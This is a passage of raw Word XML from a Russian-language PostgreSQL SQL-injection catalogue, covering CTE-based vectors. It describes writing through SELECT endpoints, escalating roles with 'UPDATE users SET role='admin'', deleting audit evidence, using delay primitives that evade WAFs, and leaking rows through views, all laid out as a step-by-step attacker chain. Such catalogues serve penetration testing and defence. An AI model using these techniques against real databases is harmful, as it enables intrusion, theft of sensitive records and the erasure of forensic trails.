          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COST</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08E778" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: WITH Queries — Materialization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — MATERIALIZED/NOT MATERIALIZED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA4BB43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Wiki: Leaky views</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — backgrounder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0DCEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Andres Freund — Pushing optimization fences in PostgreSQL 12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — анонс CTE-inline в PG 12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A180C93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Tom Lane explanation: CVE-2017-7484 и leaky operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — оригинальный security-context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A717C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection — exploiting database-specific features</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общий контекст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504805DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76159738" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В категории 3.10 разобраны три PG-специфичных вектора атаки через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WITH ... AS (...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-конструкцию (CTE), которые объединяет то, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>синтаксически это одна команда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — проходит через extended-protocol-блокировки stacked-queries (см. 3.5), и при этом несёт побочный эффект, выходящий за рамки обычного SELECT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557386E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 Data-modifying CTE (R22)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WITH ins AS (INSERT|UPDATE|DELETE ... RETURNING) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t>. Write-смug через SELECT-эндпоинт, не блокируется extended-protocol. Три карточки: INSERT в audit-log для подделки следов, UPDATE для эскалации в application-roli, DELETE для уничтожения evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1C9BD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.2 CTE как амплификатор time-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — recursive CTE / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regexp_replace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ReDoS) / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgcrypto.crypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как альтернативные delay-примитивы для 3.4 (time-based blind), когда WAF блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t>. Четыре карточки с разными trade-off-ами по compactness / detection / DoS-risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92822E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.3 Leaky views + CTE materialization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — view с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (дефолт!) + injection в WHERE с leaky-функцией → push-down предиката перед view-фильтром, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">leak строк. CTE с явным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NOT MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (дефолт PG 12+) гарантирует inline, обходя попытку защиты через CTE-обёртку. Три карточки: прямой leak, обход CTE-«защиты», обход </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через SUPERUSER + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LEAKPROOF</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41991639" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>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7"/>
        <w:gridCol w:w="1958"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="1859"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="3F101B2E"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8F657AF"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D8E9949" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Что делает</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29B4EA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Мин. привилегия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B251AF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Блокируется extended-protocol?</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9871A7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Версии-применимость</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5EA71A4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EF9185" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.1 INSERT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AE850A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Запись в audit/log таблицы</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32B5C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>INSERT на target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74C23F"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4CF02F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1+ (все)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="66F08120"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A91D71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.1 UPDATE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DB629A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Эскалация в app-роли + leak RETURNING</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626CA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UPDATE на target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EF6A83"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D5D245" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1+ (все)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="12101201"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969439" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.1 DELETE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C12241" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Удаление evidence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4BDF65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DELETE на target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C5FFFC"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FA154E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1+ (все)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="51A09BB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8F5A7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.2 Recursive CTE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8EB0F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Delay без </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_sleep</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F75A"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EBFD74"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67291A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.4+ (все)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="60ADD1C4"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83A4F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.2 generate_series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5B47A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Delay без </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pg_sleep</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D8C1E9"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93E53A"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CDDD40" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1+ (все)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="338FF52C"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552D2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.2 regexp ReDoS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B25961" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DoS-risk delay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1BD61F"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F25515"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B6B6CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.x+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="252A2500"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BD67E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.2 pgcrypto crypt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472D34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Calibrated bcrypt delay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9E1782" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PUBLIC + pgcrypto</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F8941F"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571E17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.x+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7B747C2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DA349F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.3 Direct leak</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21A220" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Leak строк через push-down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556610" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SELECT view + CREATE FUNCTION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3955BE"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9B435F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12+ (CTE inline); 9.2+ (security_barrier механизм)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0CD9749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CD0DC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.3 NOT MATERIALIZED обход</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95C0E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Обход CTE-«защиты»</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15B682" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>то же</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075E3D"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B708CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="61D7EE51"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5BAA91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.10.3 LEAKPROOF обход</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AB3600" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Обход security_barrier=on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434FC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SUPERUSER (для CREATE LEAKPROOF)</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5769F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Нет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89142D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33DE8FE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ключевое свойство: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ни один из 3.10-векторов не блокируется extended-protocol-stacking-ограничением</w:t>
      </w:r>
      <w:r>
        <w:t>. Это делает категорию принципиально опаснее 3.5: где 3.5 проходит только на драйверах в simple-protocol-режиме, 3.10 проходит везде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42D7F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Типичная цепочка применения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B644380" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атакующий после получения точки инъекции в SELECT-эндпоинте идёт по следующему шаблону:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E4976" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 recon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пытается INSERT в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если таблица существует и app-роль имеет права) → write-канал подтверждён.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D5040A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.2 для blind-уровневой разведки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если ответ HTTP не возвращает данные напрямую, использует recursive CTE как time-oracle для извлечения метаданных (см. 3.8): version, current_user, current_database().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208DB1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 UPDATE для эскалации в app-роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — UPDATE users SET role='admin' WHERE id=2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CA9518" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.3 для leak строк скрытых view-фильтром</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если в системе есть view с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security_barrier=off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (типичный default), leak через leaky-функцию → утечка password_hash, ssn, internal_notes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC67DFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.10.1 DELETE для уничтожения следов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — очистка audit_log от записи о вставленной строке через шаг (1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDBCBDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>После этого — переход к 3.6 (OOB), 3.13 (escalation в PG-роли), 3.17 (RLS bypass) — каждое использует CTE как транспорт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E28DAA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20589B00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries) vs 3.10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — закреплено в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conventions.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: stacked = несколько команд через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>, 3.10.1 = одна команда с WITH ... INSERT/UPDATE/DELETE. Разница критическая: 3.5 блокируется extended-protocol, 3.10 — нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023F052D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 (Time-based blind) vs 3.10.2</w:t>
      </w:r>
      <w:r>
